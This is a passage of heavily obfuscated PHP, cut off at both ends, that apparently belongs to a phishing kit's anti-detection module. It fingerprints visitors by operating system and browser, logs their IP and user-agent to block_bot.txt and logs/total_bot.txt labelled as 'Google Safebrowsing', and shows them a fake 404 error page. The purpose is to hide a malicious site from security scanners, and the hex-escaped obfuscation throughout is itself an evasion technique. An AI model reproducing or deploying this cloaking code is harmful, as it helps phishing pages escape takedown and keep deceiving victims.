\x786\x34"and${${"G\x4cOBAL\x53"}["qi\x71\x7a\x78vb"]}=="Fi\x72\x65fox"){$gmjvpdggy="\x66\x69\x6c\x65";$xrpywpov="\x69p\x32";$jvkcezy="c\x6ci\x63\x6b";$obpgljb="\x63\x6c\x69ck";${$gmjvpdggy}=fopen("b\x6cock_bot\x2etx\x74","\x61");${"\x47L\x4fB\x41L\x53"}["\x72l\x6dy\x74s\x64\x62\x68\x71\x6a"]="f\x69\x6c\x65";${"G\x4c\x4f\x42\x41L\x53"}["k\x61\x70\x78\x6f\x79h"]="\x63li\x63\x6b";fwrite(${${"\x47\x4c\x4f\x42AL\x53"}["r\x6c\x6dy\x74sdb\x68\x71j"]},"\x20B\x4cOC\x4b\x45\x44 \x47\x4fO\x47LE SAF\x45BR\x4f\x57S\x49\x4e\x47 || us\x65r-a\x67\x65\x6et\x20: ".$_SERVER["\x48\x54TP\x5fU\x53ER_AGENT"]."\n\x20\x69\x70\x20:\x20".${$xrpywpov}." || ".gmdate("Y-\x6e-d")."\x20----> ".gmdate("\x48:\x69:s")."\n\n");${${"\x47\x4cO\x42\x41LS"}["k\x61p\x78\x6f\x79h"]}=fopen("l\x6f\x67s/\x74\x6f\x74\x61l_b\x6ft.\x74\x78\x74","a");fwrite(${$jvkcezy},"$ip2 (\x47oo\x67\x6ce\x20\x53\x61\x66\x65br\x6fw\x73in\x67)"."\n");fclose(${$obpgljb});header("\x48T\x54\x50/1\x2e\x30\x20404\x20No\x74\x20\x46ou\x6e\x64");die("<!\x44OC\x54YPE\x20\x48T\x4dL\x20P\x55\x42LI\x43\x20\x22-//I\x45\x54F//DT\x44\x20H\x54ML \x32\x2e0//\x45N\"\x3e\x3ch\x74\x6dl\x3e<he\x61d\x3e<\x74\x69tl\x65\x3e4\x304 N\x6f\x74\x20\x46ou\x6e\x64</\x74\x69t\x6c\x65>\x3c/\x68\x65\x61\x64><\x62\x6fd\x79><h\x31\x3eNot\x20Fou\x6e\x64\x3c/\x681\x3e\x3c\x70\x3eT\x68\x65\x20re\x71ue\x73\x74e\x64 \x55\x52L w\x61\x73 \x6eo\x74 \x66oun\x64\x20\x6f\x6e t\x68i\x73\x20server.\x3c/p><p\x3e\x41\x64diti\x6f\x6e\x61\x6c\x6cy,\x20\x61\x20404 N\x6f\x74 \x46\x6fu\x6e\x64 er\x72or\x20w\x61s\x20enco\x75nter\x65\x64\x20whil\x65\x20tryi\x6e\x67 \x74\x6f \x75se\x20an Err\x6frDoc\x75\x6de\x6et\x20\x74\x6f\x20\x68\x61n\x64le\x20the r\x65\x71u\x65s\x74\x2e\x3c/p></b\x6fdy></\x68\x74\x6dl>");}if(${$qeegojfjfnu}=="\x57\x69n\x64\x6fws\x20X\x50"and${${"GLOB\x41\x4c\x53"}["\x71\x69\x71z\x78\x76b"]}=="F\x69\x72\x65\x66o\x78"){${"\x47\x4cO\x42\x41L\x53"}["\x6b\x6ep\x6f\x63\x72\x71\x62p"]="\x66\x69le";$tygrcupvst="\x66\x69\x6ce";${$tygrcupvst}=fopen("bl\x6f\x63k\x5f\x62ot.\x74xt","a");fwrite(${${"\x47\x4c\x4f\x42\x41L\x53"}["k\x6e\x70\x6fc\x72\x71\x62\x70"]},"\x20\x42\x4cOCKE\x44 \x47O\x4fG\x4c\x45 \x53\x41FE\x42ROW\x53\x49\x4eG ||\x20\x75\x73\x65r-\x61\x67\x65\x6et : ".$_SERVER["\x48TTP_\x55\x53\x45R_A\x47\x45N\x54"]."\n \x69\x70 : ".${${"G\x4c\x4fB\x41\x4c\x53"}["\x65\x6dn\x76\x72\x63\x67\x72"]}."\x20|| ".gmdate("Y-n-d")." ----> ".gmdate("H:\x69:s")."\n\n");${"\x47\x4cOB\x41L\x53"}["\x6dj\x74\x75\x63\x6b\x68"]="\x63\x6c\x69\x63\x6b";${${"G\x4c\x4fB\x41\x4c\x53"}["\x79\x6b\x63s\x6bpt\x78p\x74\x6fr"]}=fopen("l\x6fg\x73/t\x6f\x74\x61\x6c_bo\x74.\x74x\x74","a");fwrite(${${"\x47\x4c\x4fB\x41LS"}["\x79\x6bcs\x6b\x70\x74xpt\x6f\x72"]},"$ip2 (Google\x20S\x61f\x65b\x72\x6fws\x69\x6e\x67)"."\n");fclose(${${"G\x4cO\x42\x41\x4c\x53"}["\x6dj\x74u\x63k\x68"]});header("H\x54\x54P/\x31.0 \x3404\x20Not\x20Foun\x64");die("<\x21\x44OCT\x59P\x45\x20\x48\x54\x4d\x4c\x20\x50\x55B\x4c\x49\x43\x20\"-//IE\x54F//D\x54D H\x54\x4d\x4c 2.0//EN\"\x3e<\x68\x74m\x6c\x3e<\x68\x65a\x64\x3e<\x74\x69tle>\x34\x30\x34\x20N\x6f\x74\x20Fo\x75\x6ed\x3c/\x74\x69\x74le>\x3c/\x68ead\x3e\x3c\x62o\x64\x79\x3e<h1>Not F\x6f\x75nd\x3c/\x681>\x3c\x70\x3e\x54\x68\x65\x20r\x65\x71\x75est\x65d\x20\x55R\x4c\x20w\x61\x73\x20not \x66\x6fund \x6fn\x20\x74h\x69s \x73er\x76\x65\x72\x2e</\x70>\x3cp\x3e\x41\x64d\x69\x74i\x6fna\x6cly, \x61\x20\x34\x304 N\x6ft Foun\x64\x20e\x72r\x6f\x72 \x77as\x20\x65ncou\x6et\x65re\x64\x20\x77\x68\x69\x6ce t\x72\x79in\x67 t\x6f u\x73e\x20\x61\x6e \x45\x72r\x6f\x72D\x6fcu\x6dent\x20t\x6f h\x61n\x64le\x20\x74\x68e \x72e\x71\x75e\x73t\x2e\x3c/\x70>\x3c/\x62ody\x3e</\x68t\x6dl\x3e");}if(${${"GL\x4fB\x41L\x53"}["wn\x67m\x79\x6a"]}=="Windows \x58\x50"and${${"GL\x4f\x42\x41L\x53"}["\x71\x69\x71z\x78\x76\x62"]}=="\x49n\x74e\x72\x6e\x65t E\x78\x70\x6co\x72\x65r"){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x69t\x62\x65n\x62\x66"]="cli\x63\x6b";${"\x47\x4c\x4fB\x41L\x53"}["\x68g\x69\x6f\x6dn\x73"]="f\x69\x6c\x65";$swklyjzs="c\x6ci\x63\x6b";${"\x47\x4cO\x42A\x4cS"}["\x6f\x77\x62\x7a\x68\x61qv\x6f"]="f\x69l\x65";${${"\x47\x4c\x4f\x42\x41LS"}["hgi\x6f\x6d\x6e\x73"]}=fopen("\x62l\x6fck\x5fb\x6ft.txt","\x61");fwrite(${${"G\x4c\x4f\x42ALS"}["\x6f\x77\x62\x7a\x68\x61qvo"]}," \x42LOC\x4b\x45\x44 G\x4fO\x47LE \x53A\x46EB\x52O\x57\x53ING ||\x20\x75s\x65r-a\x67e\x6et : ".$_SERVER["HT\x54\x50\x5fUS\x45R_A\x47E\x4e\x54"]."\n i\x70\x20: ".${${"GLOBA\x4c\x53"}["\x65\x6d\x6e\x76\x72c\x67\x72"]}." || ".gmdate("\x59-\x6e-d")." ---->\x20".gmdate("\x48:\x69:\x73")."\n\n");${${"\x47\x4c\x4fB\x41\x4c\x53"}["\x69\x74\x62\x65\x6e\x62\x66"]}=fopen("\x6c\x6fg\x73/\x74\x6fta\x6c\x5fb\x6ft\x2e\x74\x78t","\x61");fwrite(${$swklyjzs},"$ip2\x20(\x47\x6fogl\x65\x20Sa\x66eb\x72\x6fwsi\x6e\x67)"."\n");fclose(${${"GL\x4f\x42\x41\x4c\x53"}["\x79k\x63\x73\x6b\x70\x74\x78\x70\x74\x6f\x72"]});header("\x48\x54\x54\x50/1.\x30 \x34\x30\x34\x20N\x6ft\x20\x46ound");die("<\x21\x44\x4fC\x54\x59P\x45\x20H\x54ML\x20\x50UB\x4cI\x43 \"-//\x49\x45\x54\x46//\x44\x54\x44 \x48\x54ML 2\x2e\x30//\x45N\">\x3c\x68tml\x3e<h\x65\x61\x64\x3e<tit\x6c\x65\x3e4\x30\x34 \x4eo\x74 F\x6fund\x3c/t\x69\x74\x6c\x65\x3e\x3c/h\x65\x61d>\x3cbod\x79>\x3ch1>No\x74 Foun\x64\x3c/h\x31><\x70>T\x68\x65 \x72\x65\x71u\x65st\x65d\x20U\x52L\x20wa\x73\x20\x6eo\x74\x20foun\x64 o\x6e\x20\x74\x68is serve\x72.\x3c/\x70\x3e<\x70>A\x64d\x69t\x69o\x6e\x61\x6c\x6c\x79, \x61\x204\x30\x34\x20\x4eo\x74\x20\x46ou\x6ed\x20er\x72\x6fr w\x61s\x20en\x63\x6f\x75nt\x65\x72\x65d\x20\x77\x68i\x6c\x65\x20\x74r\x79\x69n\x67\x20t\x6f\x20\x75\x73e\x20a\x6e\x20\x45\x72ro\x72Docume\x6et t\x6f\x20\x68\x61n\x64\x6c\x65 \x74he \x72\x65qu\x65st.</p>\x3c/b\x6fd\x79\x3e\x3c/ht\x6d\x6c\x3e");}if(${${"\x47\x4cO\x42AL\x53"}["\x77n\x67m\x79j"]}=="\x57\x69ndo\x77s\x20\x58\x50"and${${"\x47LOB\x41\x4cS"}["o\x77\x66\x71c\x66vic\x75\x72"]}=="\x43h\x72\x6fme"){${"\x47L\x4fB\x41\x4cS"}["\x74\x64v\x65\x73\x6f\x68\x6b\x78\x68\x7aq"]="\x66\x69le";${${"\x47\x4cOB\x41LS"}["td\x76\x65\x73o\x68kx\x68\x7aq"]}=fopen("b\x6co\x63k\x5fb\x6ft\x2et\x78t","\x61");fwrite(${${"\x47\x4c\x4fBA\x4cS"}["\x72h\x79xs\x69"]},"\x20B\x4c\x4fC\x4bE\x44\x20GO\x4fGLE \x53AF\x45\x42R\x4f\x57S\x49\x4eG ||\x20u\x73er-a\x67e\x6e\x74 : ".$_SERVER["\x48\x54\x54\x50\x5f\x55S\x45R_\x41\x47E\x4eT"]."\n\x20ip : ".${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x65\x6dn\x76r\x63\x67\x72"]}." || ".gmdate("\x59-n-d")."\x20----> ".gmdate("\x48:\x69:\x73")."\n\n");${${"\x47\x4c\x4f\x42\x41\x4cS"}["y\x6b\x63\x73\x6b\x70\x74xp\x74\x6f\x72"]}=fopen("lo\x67s/t\x6ft\x61l_\x62ot.\x74\x78t","\x61");fwrite(${${"GL\x4fB\x41\x4cS"}["y\x6bc\x73\x6b\x70t\x78\x70to\x72"]},"$ip2 (Goo\x67\x6c\x65\x20S\x61\x66ebr\x6fwsing)"."\n");fclose(${${"\x47\x4c\x4f\x42AL\x53"}["\x79kc\x73\x6b\x70tx\x70\x74or"]});header("HTT\x50/1\x2e\x30\x20\x34\x304 \x4eo\x74 \x46\x6f\x75\x6ed");die("\x3c!D\x4f\x43\x54YPE \x48TML \x50UBL\x49\x43 \x22-//\x49\x45\x54\x46//D\x54D\x20H\x54\x4d\x4c \x32\x2e\x30//E\x4e\">\x3ch\x74m\x6c\x3e<\x68ead>\x3c\x74it\x6c\x65\x3e\x34\x304\x20No\x74 F\x6fu\x6e\x64\x3c/\x74\x69\x74\x6ce></\x68ea\x64>\x3c\x62\x6fdy\x3e<h1>\x4e\x6f\x74\x20\x46o\x75nd</h\x31\x3e\x3cp>\x54\x68e r\x65\x71\x75\x65\x73\x74\x65d\x20\x55\x52\x4c was\x20not f\x6fun\x64 on \x74hi\x73 se\x72v\x65\x72\x2e</\x70\x3e\x3cp>A\x64\x64\x69t\x69\x6f\x6ea\x6cl\x79,\x20\x61 40\x34 No\x74\x20Fou\x6e\x64 e\x72r\x6f\x72 wa\x73 \x65n\x63ounte\x72e\x64 \x77\x68il\x65\x20\x74rying to\x20use \x61\x6e\x20\x45rror\x44o\x63\x75m\x65\x6et \x74\x6f\x20\x68a\x6e\x64le \x74h\x65\x20r\x65q\x75es\x74.</\x70\x3e\x3c/\x62o\x64y></ht\x6d\x6c>");}if(${${"\x47L\x4f\x42A\x4cS"}["\x77\x6egmy\x6a"]}=="Wind\x6fws\x20\x56i\x73ta"and${${"\x47L\x4f\x42\x41\x4cS"}["\x71\x69\x71z\x78\x76b"]}=="\x49\x6et\x65rn\x65t Ex\x70\x6cor\x65\x72"){$dkwtgg="\x69\x702";${"\x47\x4cO\x42\x41LS"}["\x63\x6ck\x6ce\x6c\x71yjjw"]="\x66\x69le";$ptpkrcgf="\x63\x6cic\x6b";${"\x47\x4cO\x42A\x4cS"}["\x63ne\x67\x76\x77\x6duf\x7a\x70y"]="\x63\x6c\x69c\x6b";${${"G\x4c\x4fB\x41\x4c\x53"}["\x72\x68y\x78\x73\x69"]}=fopen("\x62lo\x63k_\x62\x6ft.\x74x\x74","a");$wxmkllvhnxc="\x63\x6c\x69ck";fwrite(${${"\x47\x4c\x4f\x42A\x4c\x53"}["clk\x6c\x65l\x71y\x6a\x6a\x77"]},"\x20\x42L\x4fCK\x45\x44\x20GOOGLE\x20\x53AFE\x42ROWS\x49N\x47 || us\x65\x72-\x61\x67\x65n\x74\x20:\x20".$_SERVER["H\x54TP_\x55\x53E\x52\x5f\x41\x47\x45\x4e\x54"]."\n\x20\x69\x70\x20:\x20".${$dkwtgg}." || ".gmdate("\x59-\x6e-\x64")."\x20----\x3e ".gmdate("\x48:i:s")."\n\n");${$ptpkrcgf}=fopen("\x6co\x67\x73/\x74ot\x61l_\x62\x6f\x74.txt","a");fwrite(${$wxmkllvhnxc},"$ip2\x20(\x47o\x6fgl\x65\x20\x53\x61fe\x62\x72o\x77sing)"."\n");fclose(${${"G\x4cOB\x41L\x53"}["\x63ne\x67v\x77m\x75\x66\x7ap\x79"]});header("\x48TTP/1\x2e0 \x340\x34\x20\x4e\x6f\x74\x20\x46\x6fu\x6e\x64");die("\x3c\x21DO\x43\x54\x59PE H\x54\x4dL \x50U\x42\x4cIC \x22-//I\x45\x54\x46//DT\x44 HTML\x202\x2e0//EN\x22><h\x74\x6d\x6c\x3e<head><\x74it\x6ce\x3e4\x30\x34 \x4eot Fou\x6e\x64\x3c/t\x69\x74\x6c\x65></\x68\x65a\x64><bo\x64y>\x3c\x68\x31\x3eNot F\x6f\x75n\x64\x3c/\x681\x3e<\x70\x3eT\x68e req\x75\x65\x73t\x65\x64 U\x52L\x20w\x61s \x6e\x6f\x74\x20found \x6f\x6e\x20t\x68\x69\x73 \x73\x65\x72v\x65\x72\x2e\x3c/p><\x70>\x41d\x64\x69\x74ion\x61\x6cl\x79, a 4\x304 Not\x20\x46\x6f\x75\x6e\x64\x20e\x72ro\x72\x20\x77as\x20enc\x6fu\x6e\x74\x65r\x65\x64 \x77hile\x20t\x72\x79i\x6e\x67 to u\x73\x65 \x61\x6e \x45rro\x72\x44\x6f\x63um\x65\x6et\x20\x74o\x20ha\x6e\x64\x6c\x65\x20t\x68\x65\x20requ\x65st.\x3c/\x70></\x62\x6fdy></h\x74m\x6c>");}${"\x47\x4cOB\x41L\x53"}["bj\x78g\x72\x65"]="\x6c\x6f\x63\x6b\x5f\x63\x6f\x75\x6etr\x79";if(${${"G\x4c\x4f\x42\x41LS"}["\x77\x6eg\x6d\x79\x6a"]}=="C\x68\x72o\x6d\x65\x20OS"){$jwindzhev="\x66\x69\x6c\x65";${${"\x47\x4c\x4f\x42A\x4c\x53"}["\x72\x68\x79\x78\x73i"]}=fopen("\x62\x6c\x6fck\x5fb\x6f\x74\x2e\x74\x78t","\x61");$tsbxnxwuh="c\x6ci\x63\x6b";fwrite(${$jwindzhev},"\x20BL\x4fCKED \x47O\x4fG\x4cE \x53\x41F\x45BROW\x53I\x4eG ||\x20u\x73\x65\x72-\x61\x67\x65n\x74 :\x20".$_SERVER["\x48\x54\x54P\x5f\x55\x53\x45R\x5fAGEN\x54"]."\n\x20\x69p : ".${${"\x47\x4c\x4fB\x41L\x53"}["\x65m\x6ev\x72\x63\x67\x72"]}." || ".gmdate("\x59-n-\x64")." ----\x3e ".gmdate("\x48:i:\x73")."\n\n");${$tsbxnxwuh}=fopen("\x6c\x6fgs/\x74\x6f\x74\x61l_b\x6f\x74.t\x78\x74","\x61");${"\x47L\x4fB\x41\x4cS"}["\x6b\x79\x74\x69\x6e\x65\x65\x65\x66\x63\x6d"]="\x63\x6ci\x63\x6b";fwrite(${${"G\x4c\x4f\x42\x41LS"}["\x6b\x79t\x69n\x65\x65efc\x6d"]},"$ip2 (\x47\x6f\x6f\x67\x6ce \x53af\x65br\x6f\x77s\x69n\x67)"."\n");fclose(${${"G\x4cO\x42\x41LS"}["y\x6b\x63skp\x74xpt\x6fr"]});header("H\x54\x54P/\x31\x2e0 4\x304 \x4eo\x74\x20\x46\x6f\x75\x6e\x64");die("<\x21DO\x43\x54YP\x45\x20\x48T\x4d\x4c PU\x42\x4cI\x43\x20\"-//\x49\x45TF//DTD\x20\x48\x54\x4d\x4c\x202.0//EN\"\x3e\x3ch\x74\x6dl><h\x65a\x64\x3e\x3ctit\x6ce>\x34\x30\x34\x20Not \x46\x6fund</\x74i\x74l\x65>\x3c/hea\x64>\x3c\x62\x6fdy\x3e\x3c\x68\x31\x3e\x4eot\x20F\x6fu\x6e\x64</\x681\x3e<p\x3e\x54he\x20\x72\x65q\x75es\x74\x65d \x55\x52L \x77\x61s\x20no\x74\x20\x66o\x75\x6ed\x20o\x6e \x74his\x20\x73\x65\x72ve\x72.</\x70\x3e\x3c\x70>\x41dditional\x6cy, a\x20\x3404\x20No\x74 \x46\x6f\x75\x6e\x64 e\x72ror\x20w\x61\x73 enc\x6fun\x74\x65r\x65\x64 w\x68i\x6ce \x74r\x79\x69n\x67\x20t\x6f use\x20an E\x72r\x6f\x72Do\x63\x75\x6dent\x20t\x6f h\x61ndl\x65\x20t\x68\x65 \x72\x65\x71ue\x73\x74\x2e\x3c/p\x3e\x3c/\x62\x6f\x64y></\x68\x74ml>");}$qenugsdveelo="\x73\x65t\x74\x69n\x67";if(${${"\x47\x4c\x4f\x42\x41LS"}["\x6ceg\x7a\x76u\x61\x6cb"]}=="\x42l\x61ckBer\x72\x79"){$wwdscrs="\x69\x702";$hmfnxtuegfs="\x63\x6c\x69\x63\x6b";${${"\x47\x4cOBAL\x53"}["\x72\x68y\x78s\x69"]}=fopen("b\x6c\x6f\x63k_bot\x2etxt","\x61");fwrite(${${"G\x4cO\x42A\x4c\x53"}["\x72\x68\x79\x78si"]}," B\x4cOC\x4bE\x44 GO\x4f\x47\x4c\x45\x20\x53A\x46EB\x52OW\x53IN\x47 || us\x65r-\x61ge\x6e\x74\x20:\x20".$_SERVER["\x48\x54T\x50_U\x53ER_A\x47EN\x54"]."\n\x20\x69p :\x20".${$wwdscrs}."\x20|| ".gmdate("Y-n-d")."\x20----> ".gmdate("H:\x69:\x73")."\n\n");${$hmfnxtuegfs}=fopen("\x6c\x6f\x67s/t\x6ft\x61l_bo\x74.txt","\x61");fwrite(${${"\x47\x4c\x4f\x42\x41L\x53"}["\x79\x6b\x63\x73\x6b\x70\x74\x78p\x74\x6f\x72"]},"$ip2\x20(\x47o\x6f\x67le \x53a\x66eb\x72o\x77s\x69ng)"."\n");fclose(${${"\x47L\x4f\x42\x41\x4c\x53"}["\x79\x6bc\x73\x6bpt\x78\x70\x74\x6f\x72"]});header("\x48TT\x50/\x31\x2e0\x2040\x34 No\x74 F\x6f\x75nd");die("\x3c!D\x4fC\x54\x59PE\x20\x48T\x4dL\x20\x50UB\x4cIC\x20\"-//\x49E\x54F//\x44\x54D \x48\x54M\x4c \x32.0//E\x4e\"\x3e<h\x74m\x6c>\x3chead\x3e<\x74\x69t\x6c\x65>404 \x4e\x6ft\x20\x46ound\x3c/\x74i\x74le\x3e\x3c/\x68\x65ad\x3e\x3c\x62\x6f\x64\x79>\x3c\x68\x31\x3e\x4e\x6ft F\x6fu\x6ed</\x68\x31\x3e<\x70\x3e\x54h\x65\x20\x72\x65\x71u\x65\x73\x74\x65d\x20\x55R\x4c was\x20\x6eot\x20\x66o\x75nd o\x6e \x74hi\x73 s\x65r\x76e\x72.</\x70\x3e<\x70\x3eAdd\x69t\x69on\x61\x6cl\x79, \x61\x2040\x34\x20\x4e\x6f\x74 \x46\x6fun\x64\x20\x65r\x72\x6fr\x20\x77as\x20\x65\x6e\x63oun\x74e\x72e\x64\x20\x77\x68i\x6c\x65\x20t\x72\x79\x69ng\x20\x74\x6f\x20us\x65 \x61n\x20\x45\x72rorD\x6f\x63\x75men\x74 t\x6f\x20h\x61nd\x6c\x65 \x74he\x20r\x65\x71\x75\x65st.\x3c/p\x3e\x3c/\x62\x6f\x64\x79></\x68tml\x3e");}if(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77\x6e\x67m\x79\x6a"]}=="L\x69\x6eu\x78"){${"\x47\x4cO\x42\x41L\x53"}["plud\x6c\x68uk\x74m\x67"]="\x69p2";${${"\x47\x4c\x4fB\x41LS"}["r\x68\x79\x78si"]}=fopen("b\x6c\x6f\x63\x6b\x5fb\x6ft\x2e\x74xt","\x61");${"GL\x4fBA\x4c\x53"}["b\x78u\x65\x6a\x76\x62\x6c\x67\x72\x6d"]="\x66\x69l\x65";fwrite(${${"G\x4c\x4f\x42A\x4c\x53"}["\x62\x78uej\x76\x62\x6c\x67\x72m"]},"\x20\x42LOCK\x45\x44\x20G\x4fOG\x4cE\x20\x53AFEB\x52OWSIN\x47 || user-agen\x74 : ".$_SERVER["HT\x54\x50_USE\x52_\x41\x47\x45\x4e\x54"]."\n\x20i\x70 : ".${${"\x47L\x4f\x42ALS"}["\x70l\x75d\x6c\x68u\x6b\x74m\x67"]}." || ".gmdate("\x59-\x6e-d")."\x20----> ".gmdate("H:i:\x73")."\n\n");${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x79\x6bc\x73\x6bpt\x78pt\x6f\x72"]}=fopen("l\x6f\x67\x73/tot\x61l_\x62o\x74\x2e\x74x\x74","\x61");${"\x47L\x4fB\x41\x4c\x53"}["\x76\x68r\x7ao\x61\x6a\x6a\x69\x71\x6b\x6b"]="c\x6c\x69\x63k";fwrite(${${"\x47L\x4f\x42\x41\x4cS"}["\x79\x6b\x63\x73\x6b\x70\x74\x78\x70\x74o\x72"]},"$ip2 (\x47oog\x6ce\x20\x53\x61f\x65b\x72\x6fws\x69\x6eg)"."\n");fclose(${${"\x47\x4c\x4f\x42A\x4cS"}["\x76\x68\x72\x7a\x6f\x61\x6aj\x69qkk"]});header("\x48TT\x50/1\x2e\x30\x20\x34\x304\x20No\x74 F\x6fun\x64");die("\x3c\x21D\x4fC\x54Y\x50E\x20HTML\x20P\x55BLIC\x20\"-//I\x45TF//\x44TD\x20HTM\x4c\x20\x32\x2e\x30//EN\x22>\x3c\x68tm\x6c\x3e\x3chea\x64>\x3c\x74i\x74\x6ce\x3e4\x304\x20\x4eo\x74\x20\x46o\x75n\x64</ti\x74le\x3e</he\x61d>\x3cb\x6f\x64y\x3e\x3ch1>\x4e\x6ft \x46ou\x6ed\x3c/\x68\x31\x3e<\x70>\x54he \x72e\x71\x75es\x74ed \x55\x52L was \x6eo\x74 \x66\x6fun\x64\x20o\x6e \x74\x68is\x20ser\x76e\x72\x2e</p\x3e<\x70\x3e\x41dd\x69\x74\x69\x6fn\x61\x6c\x6c\x79, \x61 \x340\x34 \x4e\x6f\x74\x20\x46\x6fu\x6e\x64\x20\x65r\x72\x6f\x72\x20w\x61s\x20enco\x75\x6e\x74\x65\x72e\x64\x20\x77\x68ile \x74ry\x69\x6e\x67\x20\x74\x6f\x20\x75se\x20\x61n E\x72r\x6f\x72D\x6fcu\x6de\x6et t\x6f\x20h\x61n\x64l\x65 t\x68\x65\x20r\x65\x71\x75est\x2e</p\x3e\x3c/\x62\x6fd\x79>\x3c/\x68tml\x3e");}if(${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x71\x69\x71\x7a\x78\x76b"]}=="Unkno\x77\x6e\x20\x42r\x6f\x77\x73e\x72"){${"G\x4cO\x42\x41L\x53"}["\x72\x6e\x68\x67\x62m\x62"]="\x66\x69\x6c\x65";${${"GLO\x42\x41\x4c\x53"}["\x72\x68yx\x73i"]}=fopen("\x62\x6c\x6fck_\x62\x6f\x74.\x74xt","a");${"\x47\x4c\x4fBA\x4c\x53"}["\x67fl\x66g\x71\x74p"]="\x69\x702";fwrite(${${"\x47L\x4fB\x41\x4c\x53"}["\x72\x6e\x68\x67b\x6d\x62"]},"\x20BL\x4fC\x4b\x45\x44\x20GO\x4f\x47L\x45\x20S\x41FEB\x52OW\x53\x49NG\x20|| \x75\x73er-a\x67ent\x20: ".$_SERVER["\x48\x54\x54P\x5f\x55\x53\x45R\x5fA\x47EN\x54"]."\n\x20ip : ".${${"\x47L\x4f\x42\x41\x4cS"}["g\x66\x6c\x66\x67\x71\x74p"]}."\x20||\x20".gmdate("\x59-\x6e-\x64")." ---->\x20".gmdate("H:\x69:\x73")."\n\n");${${"\x47L\x4f\x42A\x4c\x53"}["\x79\x6bc\x73\x6b\x70\x74\x78\x70t\x6f\x72"]}=fopen("l\x6fg\x73/\x74\x6f\x74al\x5f\x62ot\x2etxt","\x61");fwrite(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x79\x6b\x63\x73\x6b\x70\x74\x78p\x74\x6f\x72"]},"$ip2 (\x47o\x6fg\x6ce \x53a\x66e\x62\x72\x6fws\x69ng)"."\n");fclose(${${"\x47\x4cOBA\x4c\x53"}["\x79\x6b\x63\x73k\x70\x74\x78\x70\x74\x6fr"]});header("\x48\x54\x54P/1.0 4\x30\x34\x20\x4e\x6ft Fo\x75n\x64");die("\x3c!D\x4f\x43\x54Y\x50E\x20H\x54M\x4c\x20\x50UBLIC \x22-//I\x45\x54F//DTD \x48T\x4dL\x20\x32.\x30//\x45\x4e\x22\x3e\x3c\x68t\x6dl><he\x61\x64\x3e<ti\x74\x6ce>4\x304 Not\x20\x46o\x75\x6ed</t\x69tl\x65\x3e\x3c/h\x65a\x64\x3e\x3c\x62\x6fdy\x3e<h1\x3eN\x6f\x74 \x46ou\x6e\x64\x3c/\x68\x31>\x3c\x70>\x54h\x65\x20\x72eque\x73te\x64\x20\x55RL w\x61\x73\x20\x6eot f\x6fu\x6ed\x20\x6f\x6e t\x68is \x73erver\x2e</\x70\x3e<\x70\x3e\x41\x64d\x69tio\x6eall\x79, \x61 \x34\x304 Not\x20F\x6fu\x6e\x64\x20e\x72r\x6fr\x20w\x61s \x65\x6e\x63o\x75\x6e\x74e\x72\x65d\x20whil\x65 \x74r\x79in\x67 \x74\x6f\x20\x75s\x65 an\x20ErrorDo\x63\x75m\x65\x6e\x74 to\x20\x68\x61nd\x6c\x65 th\x65\x20\x72e\x71\x75es\x74\x2e</\x70\x3e\x3c/body\x3e</h\x74m\x6c>");}if(${$lrudnkxtptj}=="I\x6ete\x72ne\x74\x20Ex\x70l\x6f\x72er"){${"\x47L\x4f\x42\x41\x4cS"}["\x6eup\x66\x6fri"]="\x66\x69l\x65";$vuvrim="\x69\x70\x32";${"\x47\x4c\x4fB\x41L\x53"}["\x67\x77\x63gg\x74\x67\x63\x75\x6d\x69\x69"]="f\x69le";${${"\x47\x4c\x4f\x42AL\x53"}["nu\x70fo\x72i"]}=fopen("blo\x63k\x5fb\x6ft.txt","\x61");fwrite(${${"\x47\x4c\x4fBA\x4cS"}["\x67wc\x67\x67\x74\x67\x63um\x69\x69"]}," B\x4c\x4f\x43KE\x44\x20\x47O\x4f\x47L\x45\x20SA\x46EBROW\x53ING || \x75\x73e\x72-a\x67en\x74 : ".$_SERVER["\x48\x54\x54\x50_\x55S\x45R_\x41G\x45NT"]."\n ip\x20: ".${$vuvrim}."\x20||\x20".gmdate("\x59-\x6e-\x64")." ----\x3e ".gmdate("H:\x69:s")."\n\n");$gmcernyur="\x63l\x69\x63\x6b";${${"\x47\x4c\x4f\x42A\x4cS"}["y\x6b\x63s\x6b\x70tx\x70\x74o\x72"]}=fopen("\x6co\x67s/\x74\x6ftal_\x62\x6f\x74.\x74\x78t","\x61");fwrite(${$gmcernyur},"$ip2\x20(\x47\x6f\x6fg\x6ce\x20\x53\x61\x66\x65\x62rows\x69n\x67)"."\n");fclose(${${"\x47\x4cO\x42A\x4c\x53"}["\x79k\x63\x73\x6b\x70\x74\x78\x70to\x72"]});header("H\x54T\x50/1\x2e\x30 404\x20Not F\x6fu\x6ed");die("\x3c\x21D\x4fCTY\x50E H\x54\x4d\x4c \x50U\x42L\x49\x43 \x22-//\x49ETF//\x44T\x44\x20\x48TM\x4c\x20\x32.\x30//E\x4e\"\x3e<\x68tml>\x3c\x68ea\x64>\x3c\x74i\x74le>\x340\x34\x20\x4e\x6ft\x20F\x6fund\x3c/ti\x74\x6c\x65></\x68ea\x64\x3e<\x62\x6fd\x79>\x3c\x681\x3eNo\x74\x20\x46\x6fund\x3c/\x681\x3e\x3c\x70\x3e\x54h\x65 \x72e\x71ue\x73t\x65\x64\x20U\x52\x4c w\x61\x73\x20\x6e\x6f\x74\x20f\x6f\x75\x6e\x64 o\x6e\x20\x74h\x69s s\x65\x72ver\x2e</p><\x70>Add\x69\x74io\x6e\x61\x6c\x6cy,\x20a 4\x30\x34 No\x74\x20\x46\x6f\x75nd\x20\x65r\x72\x6f\x72 wa\x73 \x65n\x63ou\x6e\x74\x65\x72e\x64\x20\x77hile \x74ry\x69\x6e\x67 t\x6f \x75\x73\x65 \x61n \x45\x72\x72o\x72\x44o\x63umen\x74\x20to\x20h\x61\x6ed\x6ce 